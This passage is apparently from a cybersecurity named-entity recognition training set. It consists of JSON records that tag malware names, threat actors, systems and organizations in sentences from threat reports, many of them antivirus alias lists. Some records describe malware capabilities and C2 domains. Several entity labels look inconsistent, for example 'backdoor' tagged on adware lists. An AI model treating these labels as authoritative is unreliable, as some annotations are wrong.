TROJ_BHO.SMK Win32.Trojan.WisdomEyes.16070401.9500.9922 W32/MalwareS.AXKH TROJ_BHO.SMK Trojan.DownLoader7.50629 BehavesLike.Win32.PWSZbot.dm Backdoor.WinNT.PcClient W32/Risk.AWDS-7973", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004694", "source": "cyner2_train"}} {"text": "Initially, only the Windows version of ROKRAT was used, but the Android version of the malware was later identified.", "spans": {"SYSTEM: the Windows version": [[16, 35]], "MALWARE: ROKRAT": [[39, 45]], "SYSTEM: Android version": [[64, 79]], "MALWARE: malware": [[87, 94]]}, "info": {"id": "cyner2_train_004695", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.F73E Backdoor/W32.Xhaker.593920 Backdoor.Xhaker.b.n7 Backdoor.Xhaker.Win32.49 Backdoor/Xhaker.b Trojan.Win32.Xhaker.cbfde W32/BackdoorX.BNHA Backdoor.Trojan Smalldoor.BKPC Backdoor.Win32.Xhaker.b Backdoor.Xhaker!qYrnZt9Kncc PE:Backdoor.Win32.VB.bnx!1075029071 BackDoor.Caverns.79 BehavesLike.Win32.Ramnit.hc W32/Backdoor.IYKC-7331 Backdoor/Xhaker.l Win32.Hack.Xhaker.b.kcloud Win32.Backdoor.Xhaker.doln W32/Xhaker.B!tr.bdr 
Backdoor.Win32.Xhaker.b Win32/Backdoor.bee", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004696", "source": "cyner2_train"}} {"text": "We recently uncovered a coordinated campaign targeting Internet infrastructure providers, a media organization, a financial services company, and an Asian government organization.", "spans": {"THREAT_ACTOR: campaign": [[36, 44]], "SYSTEM: Internet infrastructure": [[55, 78]], "ORGANIZATION: providers,": [[79, 89]], "ORGANIZATION: media organization, a financial services company,": [[92, 141]], "ORGANIZATION: Asian government organization.": [[149, 179]]}, "info": {"id": "cyner2_train_004697", "source": "cyner2_train"}} {"text": "XLoader can also load multiple malicious modules to receive and execute commands from its remote command-and-control ( C & C ) server , as shown below : Here ’ s a list of the modules and their functions : sendSms — send SMS/MMS to a specified address setWifi — enable or disable Wi-Fi connection gcont — collect all the device ’ s contacts lock — currently just an input lock status in the settings ( pref ) file , but may be used as a screenlocking ransomware bc — collect all contacts from the Android device and SIM card setForward — currently not implemented , but can be used to hijack the infected device getForward — currently not implemented , but can be used to hijack the infected device hasPkg — check the device whether a specified app is installed or not setRingerMode — set the device ’ s ringer mode setRecEnable — set the device ’ s ringer mode as silent reqState — get a detailed phone connection status , which includes activated network and Wi-Fi ( with or without password ) showHome — force the device ’ s back to the home screen getnpki : get files/content from the folder named NPKI ( contains certificates related to financial transactions ) http — access a specified network using HttpURLConnection onRecordAction — simulate a number-dialed tone call — call a specified 
number get_apps — get all the apps installed on the device show_fs_float_window — show a full-screen window for phishing Of note is XLoader ’ s abuse of the WebSocket protocol ( supported in many browsers and web applications ) via ws ( WebSockets ) or wss ( WebSockets over SSL/TLS ) to communicate with its C & C servers .", "spans": {"MALWARE: XLoader": [[0, 7], [1428, 1435]], "SYSTEM: Android": [[497, 504]]}, "info": {"id": "cyner2_train_004698", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.AutorunMI.Worm Trojan-Downloader.Win32.Flux!O Worm.AutoRun Trojan/Dropper.aiv Win32.Trojan.WisdomEyes.16070401.9500.9998 Win.Trojan.Autorun-973 Worm.Win32.AutoRun.lt Trojan.Win32.AutoRun.18461 Constructor.W32.VB.lgxd Backdoor.Win32.Popwin.~IQ Trojan.Popwin Worm/Win32.AutoRun Worm.AutoRunsT.ot.18432 Worm.Win32.AutoRun.lt Worm.Winko", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004699", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.SmalBHQc.Trojan Trojan.Zenshirsh.SL7 PUP.AdLoad/Variant not-a-virus:Downloader.Win32.AdLoad.syjh Trojan.Win32.Kazy.dydcdw Trojan.Vittalia.800 BehavesLike.Win32.Downloader.lc Variant.Kazy.ds PUA/IStartSurf.chew GrayWare[Adware]/Win32.istartsurf.a Trojan.Application.Bundler.Outbrowse.16 not-a-virus:Downloader.Win32.AdLoad.syjh TrojanDownloader:Win32/Subroate.A!bit Downloader.AdLoad PUA.Downloader!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004700", "source": "cyner2_train"}} {"text": "In this report, we'll review how the actors attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan.", "spans": {"THREAT_ACTOR: actors": [[37, 43]], "MALWARE: exploit": [[57, 64]], "MALWARE: NetTraveler Trojan.": [[94, 113]]}, "info": {"id": "cyner2_train_004701", "source": "cyner2_train"}} {"text": "Interestingly, it utilizes a pseudorandom number generator PRNG used in Vawtrak s loader.", "spans": {"MALWARE: Vawtrak s loader.": [[72, 89]]}, "info": 
{"id": "cyner2_train_004702", "source": "cyner2_train"}} {"text": "The iframe leads to Angler EK which downloads Bedep ad-fraud which then downloads a Gootkit loader.", "spans": {"MALWARE: Angler EK": [[20, 29]], "MALWARE: Bedep ad-fraud": [[46, 60]], "MALWARE: Gootkit loader.": [[84, 99]]}, "info": {"id": "cyner2_train_004704", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Razy.D3D173 Win32.Trojan.WisdomEyes.16070401.9500.9961 Ransom_Nymaim.R002C0DAT18 Ransom_Nymaim.R002C0DAT18 Ransom:Win32/Nymaim.F Win32/Trojan.160", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004706", "source": "cyner2_train"}} {"text": "Based on our investigation, the actors behind Operation C-Major were able to keep their Android malware on Google Play for months and they advertised their apps on Facebook pages which have thousands of likes from high profile targets.", "spans": {"THREAT_ACTOR: Operation C-Major": [[46, 63]], "MALWARE: Android malware": [[88, 103]], "SYSTEM: Google Play": [[107, 118]], "SYSTEM: apps": [[156, 160]], "ORGANIZATION: Facebook": [[164, 172]], "ORGANIZATION: high profile targets.": [[214, 235]]}, "info": {"id": "cyner2_train_004708", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.MMTask.59905 Trojan/PSW.Mmtask.a Trojan.Heur.GM.040605A000 Win32.Trojan.WisdomEyes.16070401.9500.9759 W32/Trojan.ALHG-3475 Win.Trojan.Mmtask-1 Trojan-PSW.Win32.Mmtask.a Trojan.Win32.Mmtask.glty Trojan.Win32.MMTask.59905 Troj.PSW32.W.Mmtask.a!c TrojWare.Win32.PSW.MMTask.A Trojan.MMTask.1 BehavesLike.Win32.PWSZbot.qc Trojan/PSW.MMTask.a TR/PSW.MMTask.A1 Trojan[PSW]/Win32.Mmtask PWS:Win32/MMTask.A Trojan-PSW.Win32.Mmtask.a TrojanPSW.Mmtask Win32/PSW.MMTask.A Win32.Trojan-qqpass.Qqrob.Wuhe Trojan.PWS.Mmtask!shxUVb0b7bE Trojan-PWS.Win32.Mmtask W32/Bdoor.BG!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004710", "source": "cyner2_train"}} {"text": "A backdoor also known as: Heur.Corrupt.PE 
W32.Backdoor.Rbot Trojan:Win32/Damingvat.A.dam#2 Backdoor/Win32.Graybird.C918907", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004714", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Spy/W32.Banker.113430.B Heur.Win32.VBKrypt.3!O Trojan.Tinba.F3 Trojan.Tinba.Win32.1756 Trojan/Injector.bzpp Win32.Trojan.WisdomEyes.16070401.9500.9974 W32.Cridex.B TROJ_TINBA.SMH Win32.Trojan.Emotet.U Trojan.Win32.VB.dmqp Trojan.Win32.Tinba.euqtlz Troj.W32.VBKrypt.tpek Trojan.PWS.Tinba.161 TROJ_TINBA.SMH BehavesLike.Win32.Emotet.cm Trojan/Banker.Tinba.amp TR/Tinba.A.843 Trojan[Banker]/Win32.Tinba Trojan.Win32.VB.dmqp Trojan/Win32.Cridex.R197444 TrojanBanker.Tinba Trojan.PWS.Tinba! Trojan-Banker.Emotet W32/Injector.BZJE!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004717", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.CD60 Downloader.Bagle.Win32.491 Trojan/Downloader.Bagle.atn Trojan.Win32.Bagle.dswqdy Troj.Downloader.W32.Bagle.atn!c Trojan.Packed.650 Trojan-Downloader.Win32.Bagle TrojanDownloader.Bagle.bfu Worm/Win32.Bagle.R767 Trojan.DL.Bagle!+mahMemQ9a4 W32/Bagle.ATN!tr.dldr Trj/CI.A Win32/Trojan.2ff", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004719", "source": "cyner2_train"}} {"text": "Although this injector is new, there are some connections to its older version sharing some similarities.", "spans": {"MALWARE: injector": [[14, 22]]}, "info": {"id": "cyner2_train_004721", "source": "cyner2_train"}} {"text": "Proofpoint calls the two new variants recently identified Forked and Lite IcedID.", "spans": {"ORGANIZATION: Proofpoint": [[0, 10]], "MALWARE: Lite IcedID.": [[69, 81]]}, "info": {"id": "cyner2_train_004722", "source": "cyner2_train"}} {"text": "Blackhole's author, Paunch, was arrested in October 2013 and while criminals kept using the kit for the next few months, the exploits slowly deprecated and lost value because of lack of 
development.", "spans": {"THREAT_ACTOR: Blackhole's author, Paunch,": [[0, 27]], "THREAT_ACTOR: criminals": [[67, 76]], "MALWARE: kit for": [[92, 99]], "MALWARE: exploits": [[125, 133]]}, "info": {"id": "cyner2_train_004723", "source": "cyner2_train"}} {"text": "We named this family Kemoge due to its command and control CnC domain", "spans": {"MALWARE: Kemoge": [[21, 27]]}, "info": {"id": "cyner2_train_004724", "source": "cyner2_train"}} {"text": "There has been significant media attention around a campaign likely by a nation-state actor targeting energy organizations in the U.S. including entities operating nuclear facilities.", "spans": {"ORGANIZATION: media": [[27, 32]], "THREAT_ACTOR: campaign": [[52, 60]], "THREAT_ACTOR: nation-state actor": [[73, 91]], "ORGANIZATION: energy organizations": [[102, 122]], "ORGANIZATION: entities operating nuclear facilities.": [[145, 183]]}, "info": {"id": "cyner2_train_004728", "source": "cyner2_train"}} {"text": "A backdoor also known as: W97M.Downloader.XL W97M/Downloader.buv W97M.Downloader W2KM_DLOADER.AUSUAY Trojan.Ole2.Vbs-heuristic.druvzi W97M.S.Downloader.217088 W97M.MulDrop.158 W2KM_DLOADER.AUSUAY W97M/Downloader.buv TrojanDropper:O97M/Turla.A!dha virus.office.qexvmc.1080", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004730", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Delfinject.18174 Win32.Trojan.WisdomEyes.16070401.9500.9930 Trojan.Win32.Banker.dnoogt Trojan.DownLoader12.55999 BehavesLike.Win32.Dropper.dm W32/Trojan.XESH-6077 TrojanDownloader.Banload.bimh TR/Dldr.Banload.ybjwz TrojanDownloader:Win32/BrobanKew.A TrojanBanker.Banker Trj/CI.A Win32/TrojanDownloader.Banload.VDB Trojan-Downloader.Win32.Banload W32/Banload.VGG!tr.dldr Win32/Trojan.994", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004731", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9840 Trojan:Win32/ShadowPad.E!dha", 
"spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004733", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.FakeAv.exgvmw Virus.W32.Virus!c TROJ_KRYPTIK_HA230029.UVPM Trojan.Win32.Crypt Trojan.Banker.GozNym.ey Trojan[Banker]/Win32.GozNym TrojanDownloader:Win32/Nymaim.K Trj/GdSda.A W32/Kryptik.GCCW!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004735", "source": "cyner2_train"}} {"text": "The current phase of the Pawn Storm attack campaign started a little over a month ago, and the overall campaign was first identified in an October 2014 report from Trend Micro PDF.", "spans": {"THREAT_ACTOR: Pawn Storm": [[25, 35]], "THREAT_ACTOR: campaign": [[43, 51], [103, 111]], "ORGANIZATION: Trend Micro": [[164, 175]]}, "info": {"id": "cyner2_train_004737", "source": "cyner2_train"}} {"text": "The Security Service of Ukraine SBU is continuously investigating this active threat, and has issued statements attributing the attacks to specific branches of the Russian Federal Security Service FSB.", "spans": {"ORGANIZATION: The Security Service of Ukraine SBU": [[0, 35]], "ORGANIZATION: Russian Federal Security Service": [[164, 196]]}, "info": {"id": "cyner2_train_004739", "source": "cyner2_train"}} {"text": "A backdoor also known as: Adware.Msidebar TSPY_STARTPAGE_CD100271.RDXN Win32.Trojan.WisdomEyes.16070401.9500.9721 Trojan.ADH.2 TSPY_STARTPAGE_CD100271.RDXN not-a-virus:AdWare.Win32.Loadwar.wmx Riskware.Win32.Loadwar.epwdej Win32.Trojan.Multiple.drwj Trojan.DownLoader7.8701 BehavesLike.Win32.Dropper.cc TR/Msidebar.C.39 GrayWare[AdWare]/Win32.Loadwar not-a-virus:AdWare.Win32.Loadwar.wmx Trojan:Win32/Msidebar.C Trj/CI.A Trojan.Win32.Msidebar Win32/Trojan.1a4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004740", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Ehdoor Trojan/Win32.Sharik.R208903 Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, 
"info": {"id": "cyner2_train_004741", "source": "cyner2_train"}} {"text": "A backdoor also known as: Hoax.Win32.ArchSMS!O Tool.ArchSMS.Win32.7363 Trojan/ArchSMS.otfk Trojan.Zusy.D4232C Win32.Trojan.SMSSend.a PUA.PremiumSMSScam!g14 Hoax.Win32.ArchSMS.cpmhw Riskware.Win32.galh.eaqeda Hoax.W32.Archsms!c ApplicUnwnt.Win32.Hoax.ArchSMS.TP Trojan.SMSSend.7500 BehavesLike.Win32.Dropper.vc Hoax.Win32.ArchSMS W32.Trojan.Archsms HackTool[Hoax]/Win32.ArchSMS Trojan:Win32/Tarifarch.AO Hoax.Win32.ArchSMS.cpmhw Unwanted/Win32.ArchSMS.R216870 Win32.Trojan-psw.Archsms.Htcd Trojan.ArchSMS!vRB02EvsodQ Win32/Trojan.SMS.604", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004742", "source": "cyner2_train"}} {"text": "From the beginning of 2015, a malicious spear-phishing campaign dubbed Pony, has been actively luring victims.", "spans": {"THREAT_ACTOR: malicious spear-phishing campaign": [[30, 63]], "MALWARE: Pony,": [[71, 76]]}, "info": {"id": "cyner2_train_004747", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojandownloader.Script W32/Trojan.EMGI-1028 Trojan.Win32.Banload.evocsm Troj.Downloader.Script!c TR/AD.Banload.jxcsg Trj/GdSda.A Win32/Trojan.Downloader.251", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004749", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9866 Ransom.BTCware Win.Ransomware.BTCWare-6329927-0 Win32.Trojan-Ransom.BTCWare.E Trojan.Win32.Filecoder.eplmfi Trojan.Encoder.11958 BehavesLike.Win32.FDoSBEnergy.dh AdWare.ConvertAd.qjt Ransom.Filecoder/Variant Trojan/Win32.Ransom.R208332 Ransom.BTCWare Trj/GdSda.A Trojan.Win32.BTCWare.a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004752", "source": "cyner2_train"}} {"text": "File encryption utilized asymmetric Elliptic Curve Cryptography ECC with Curve SECT233R1 a.k.a. 
NIST B-233 using the Tiny-ECDH open source library combined with a per file Salsa20 symmetric key.", "spans": {"MALWARE: File encryption": [[0, 15]], "SYSTEM: Elliptic Curve Cryptography ECC": [[36, 67]], "SYSTEM: Curve SECT233R1": [[73, 88]], "SYSTEM: NIST B-233": [[96, 106]], "SYSTEM: Tiny-ECDH open source": [[117, 138]], "SYSTEM: Salsa20 symmetric key.": [[172, 194]]}, "info": {"id": "cyner2_train_004755", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Heur.kmGfrjraeapm2 W32/Trojan-Gypikon-based.DM2!Ma BehavesLike.Win32.Downloader.cc W32/Trojan-Gypikon-based.DM2!Ma Trojan/Banker.Banker.zmm Worm:Win32/Xtrat.B!A BScope.Trojan-Spy.Zbot Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004756", "source": "cyner2_train"}} {"text": "An unknown threat actor is leveraging an evasive threat campaign distributed via Discord that features the PureCrypter downloader and targets government entities.", "spans": {"THREAT_ACTOR: An unknown threat actor": [[0, 23]], "THREAT_ACTOR: threat campaign distributed": [[49, 76]], "SYSTEM: Discord": [[81, 88]], "MALWARE: the PureCrypter downloader": [[103, 129]], "ORGANIZATION: government entities.": [[142, 162]]}, "info": {"id": "cyner2_train_004758", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.DroxpesLTAN.Trojan Trojan.Qhost Trojan/Qhost.niv TROJ_SPNR.0BFE11 Win32.Trojan.Qhost.d W32/Trojan2.LITU Win32/Tnega.ATUN TROJ_SPNR.0BFE11 Win.Trojan.6761663-1 Trojan.BAT.Qhost.abp Trojan.Win32.KKQP3298.dkyjvz Trojan.Win32.Z.Qhost.33750 Troj.Bat.Qhost!c Trojan.Hosts.43761 BehavesLike.Win32.BadFile.nh Trojan-Dropper.Win32.StartPage W32/Trojan.KKQP-3298 TR/Qhost.mju.53 Trojan.BAT.Qhost.abp Trojan/Win32.Qhost.R77387 Trojan.BAT.Qhost Trj/CI.A BAT/Qhost.NTH Bat.Trojan.Qhost.Lnya Trojan.Comisproc!uAYBYZyFk6g Win32/Trojan.34d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004759", "source": "cyner2_train"}} {"text": "What Does SimBad Do ? 
‘ SimBad ’ has capabilities that can be divided into three groups – Show Ads , Phishing , and Exposure to other applications .", "spans": {"MALWARE: SimBad": [[10, 16], [24, 30]]}, "info": {"id": "cyner2_train_004760", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.VidemoY.Trojan Win32.Trojan.WisdomEyes.16070401.9500.9988 Backdoor.Trojan Win.Trojan.Bifrose-17928 Trojan.Win32.Bifrost.csybxh Troj.W32.Jorik.Arcdoor.bjr!c BackDoor.Bifrost.15005 Trojan.Inject.Win32.22484 Worm.Win32.Msil Trojan:MSIL/Harvbot.B TrojanDropper.Injector Trj/CI.A W32/Jorik_Arcdoor.BJR!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004763", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom.FireCrypt.A3 Ransom.BleedGreen Ransom_BleedGreen.A Win32.Trojan.WisdomEyes.16070401.9500.9560 Ransom.FireCrypt Ransom_BleedGreen.A Trojan-Ransom.Win32.Crypmodadv.xee Trojan.Win32.Z.Ransom.18432.C[h] Trojan.Encoder.10088 Trojan.Crypmodadv.Win32.90 trojanspy.msil.neos.a W32/Trojan.RPJE-7166 Trojan.Crypmodadv.en TR/Dropper.MSIL.owdes MSIL/Filecoder.DZ!tr Trojan.Ransom.HiddenTears.1 Ransom:Win32/Firecrypt.A Trojan.Ransom.FireCrypt Win32.Trojan.Crypmodadv.Pbpb Trojan.Crypmodadv! 
Trojan.VB.Inject Atros4.BUNV Trj/GdSda.A Win32/Trojan.Ransom.786", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004764", "source": "cyner2_train"}} {"text": "We dubbed this campaign Operation Electric Powder", "spans": {"THREAT_ACTOR: campaign Operation Electric Powder": [[15, 49]]}, "info": {"id": "cyner2_train_004766", "source": "cyner2_train"}} {"text": ") Following is the snippet of code in these older Exodus One samples showing the connection to the Command & Control : Below is the almost identical composition of the request to the Command & Control server in mike.jar ( also containing the path 7e661733-e332-429a-a7e2-23649f27690f ) : To further corroborate the connection of the Exodus spyware with eSurv , the domain attiva.exodus.esurv.it resolves to the IP 212.47.242.236 which , according to public passive DNS data , in 2017 was used to host the domain server1cs.exodus.connexxa.it .", "spans": {"MALWARE: Exodus One": [[50, 60]], "MALWARE: Exodus spyware": [[333, 347]]}, "info": {"id": "cyner2_train_004767", "source": "cyner2_train"}} {"text": "The attack comes as an email containing a malicious Google Docs link.", "spans": {}, "info": {"id": "cyner2_train_004770", "source": "cyner2_train"}} {"text": "Beginning in early 2008, Iranian security entities have engaged in operations to identify and arrest administrators of illicit websites and social media groups.", "spans": {"ORGANIZATION: Iranian security entities": [[25, 50]], "THREAT_ACTOR: administrators": [[101, 115]], "THREAT_ACTOR: social media groups.": [[140, 160]]}, "info": {"id": "cyner2_train_004772", "source": "cyner2_train"}} {"text": "Musical Chairs is a multi-year campaign which recently deployed of new variant Gh0st we've named Piano Gh0st.", "spans": {"THREAT_ACTOR: Musical Chairs": [[0, 14]], "MALWARE: variant Gh0st": [[71, 84]], "MALWARE: Piano Gh0st.": [[97, 109]]}, "info": {"id": "cyner2_train_004776", "source": "cyner2_train"}} {"text": "Odinaff is typically 
deployed in the first stage of an attack, to gain a foothold onto the network, providing a persistent presence and the ability to install additional tools onto the target network.", "spans": {"MALWARE: Odinaff": [[0, 7]], "SYSTEM: network,": [[91, 99]], "MALWARE: tools": [[170, 175]], "SYSTEM: network.": [[192, 200]]}, "info": {"id": "cyner2_train_004777", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9993 W32/Trojan.VVLV-9156 MSIL.Packed.Kryptik.JH Trojan.Win32.Razy.exgpmg BehavesLike.Win32.Trojan.gc Trojan.Razy.D2685F Trojan/Win32.Randrew.C2365157 Trojan-Dropper.MSIL.Small Trj/CI.A Win32/Trojan.24d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004778", "source": "cyner2_train"}} {"text": "A backdoor also known as: W97M_DLOADR.XTRQ W97M_DLOADR.XTRQ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004784", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Kazy.DC9EF Win32.Trojan.WisdomEyes.16070401.9500.9996 W32/Trojan.QFDJ-7788 Backdoor.Trojan Trojan.DownLoader5.32593 Trojan.Small Win32.Troj.Disfa.cv.kcloud Backdoor:MSIL/Sootbot.B Trj/CI.A Win32.Trojan.Downloader.Dyzw BackDoor.WE!tr Win32/Trojan.018", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004785", "source": "cyner2_train"}} {"text": "A backdoor also known as: Packer.FSG.A Packer.FSG.A Downloader.WebDown.Win32.23 Troj.Downloader.W32.WebDown.10!c Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Downloader.BFIA TROJ_APHER.A Win.Trojan.Small-10534 Trojan-Downloader.Win32.WebDown.10 Packer.FSG.A Trojan.Win32.WebDown.buycqa Win32.Trojan-Downloader.Webdown.bfes Packer.FSG.A Trojan.DownLoader.2103 TROJ_APHER.A W32/Downloader.MUZI-7025 Trojan/Downloader.WebDown.10 Trojan/Win32.Unknown TrojanDownloader:Win32/Aphex.2_4 Packer.FSG.A Trojan-Downloader.Win32.WebDown.10 Packer.FSG.A Win-Trojan/Apher.1312 Win32/TrojanDownloader.Apher.070 Trojan.DL.WebDown!Zgs3lnw1FbY 
Trojan-Downloader.Win32.WebDown Trj/Downloader.GE", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004787", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Multi Trojan.MalPack.VB Uds.Dangerousobject.Multi!c Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan-Spy.Win32.SpyEyes.bdxs Trojan.Win32.Z.Fareitvb.933888 BehavesLike.Win32.BadFile.dh Trojan.VB.Crypt TR/Dropper.VB.dtffd Trojan[Spy]/Win32.SpyEyes Trojan-Spy.Win32.SpyEyes.bdxs Trojan/Win32.VBKrypt.R218990 Trj/GdSda.A Win32.Trojan.Inject.Auto Win32/Trojan.Spy.8cb", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004788", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.StrictorCS.S483160 Trojan.Graftor.D21F45 Win32.Application.PUPStudio.A HEUR:Trojan.Win32.KillFiles Trojan.Win32.Drop.eaoavd Trojan.Win32.Z.Graftor.614400.AJ Trojan.MulDrop5.12779 Trojan.KillFiles.Win32.6511 W32/Trojan.XBKC-8948 TR/Graftor.905216.18 TrojanDownloader:Win32/WebToos.A HEUR:Trojan.Win32.KillFiles Trojan/Win32.Krap.R106509 TrojanDropper.Sysn Trj/CI.A Trojan.DownLoader! 
Win32/Trojan.0cb", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004790", "source": "cyner2_train"}} {"text": "A backdoor also known as: BackDoor.Dande.52 Trojan.Dande.Win32.1 Trojan.Win32.Dande BDS/Dande.xihzl Trojan.Zusy.D3503B Win32/Dande.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004791", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojandropper.Scrop TROJ_DROPPR.YYYJ Trojan-Dropper.Win32.Scrop.cxq Trojan.Win32.Autoit.euuwjs Troj.Dropper.W32.Scrop!c Trojan.DownLoader25.53180 TROJ_DROPPR.YYYJ Trojan.ECCW-6 TR/Autoit.wkswc Trojan[Exploit]/OLE.CVE-2014-6532 Trojan:O97M/Tanequalyn.A Trojan/Win32.AutoIt.C2019675 Win32.Trojan-dropper.Scrop.Pavt W32/Scrop.CO!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004792", "source": "cyner2_train"}} {"text": "Interestingly enough, Sourcefire was the only security vendor directly referenced in the Powershell script.", "spans": {"ORGANIZATION: Sourcefire": [[22, 32]], "ORGANIZATION: only security vendor": [[41, 61]]}, "info": {"id": "cyner2_train_004793", "source": "cyner2_train"}} {"text": "This malware attempts to collect a user's online banking data and sends out information to a control server.", "spans": {"MALWARE: malware": [[5, 12]], "SYSTEM: control server.": [[93, 108]]}, "info": {"id": "cyner2_train_004794", "source": "cyner2_train"}} {"text": "Since the beginning of 2017, ESET researchers have been conducting an investigation into a complex threat mainly targeting Russia and Ukraine.", "spans": {"ORGANIZATION: ESET researchers": [[29, 45]], "MALWARE: complex threat": [[91, 105]]}, "info": {"id": "cyner2_train_004796", "source": "cyner2_train"}} {"text": "A backdoor also known as: AdClicker-O.dr Trojan.Win32.Revop.nbqd W32/TrojanX.HJO Adware.Winpup TROJ_REVOP.A Trojan-Downloader.Win32.VB.ca Trojan.Win32.A.Revop.251830[h] TROJ_REVOP.A AdClicker-O.dr W32/Trojan.MQHB-1521 Win32/TrojanDownloader.VB.CA 
SPR/Commercials.1 Trojan/Win32.Revop Win32.Troj.Undef.kcloud TrojanDownloader:Win32/VB.CA TrojanDownloader.VB Trj/Multidropper.BJ Win32.Trojan.Revop.cxum Trojan-Downloader.Win32.VB.CA W32/REVOP.A!tr Downloader.VB.EC Trojan.Win32.VB.AhnP", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004797", "source": "cyner2_train"}} {"text": "A backdoor also known as: BackDoor-EDY.b Trojan.ExeDot.Win32.325 Trojan/ExeDot.cra Win32.Trojan.WisdomEyes.16070401.9500.9965 TROJ_EXEDOT.SMA Win.Trojan.Exedot-43 Trojan.Win32.ExeDot.dsmyq TrojWare.Win32.ExeDot.L TROJ_EXEDOT.SMA BackDoor-EDY.b Trojan/ExeDot.bs Trojan:Win32/Evadiped.A Trojan/Win32.Unknown Win32.Troj.ExeDot.kcloud Trojan.Heur.E8C832 Trojan:Win32/Evadiped.A Trojan/Win32.ExeDot.R4137 Trojan.ExeDot Trojan.BHO!WIw+XSz27Q8 Trojan.Win32.ExeDot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004799", "source": "cyner2_train"}} {"text": "The main goal of this malware is to steal banking credentials from the victim's device.", "spans": {"MALWARE: malware": [[22, 29]], "SYSTEM: the victim's device.": [[67, 87]]}, "info": {"id": "cyner2_train_004800", "source": "cyner2_train"}} {"text": "Honkbox is an active threat with at least three variants and multiple components, some of which have not been previously documented.", "spans": {"MALWARE: Honkbox": [[0, 7]], "MALWARE: active threat": [[14, 27]], "MALWARE: variants": [[48, 56]]}, "info": {"id": "cyner2_train_004803", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9985 Infostealer.Limitail TSPY_INFILOG.SM TSPY_INFILOG.SM TrojanSpy:MSIL/Grieftylo.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004804", "source": "cyner2_train"}} {"text": "The actor responsible for this campaign utilized legitimate digital certificates to sign their tools and employed innovative techniques to cloak their command and control traffic.", "spans": {"THREAT_ACTOR: actor": [[4, 
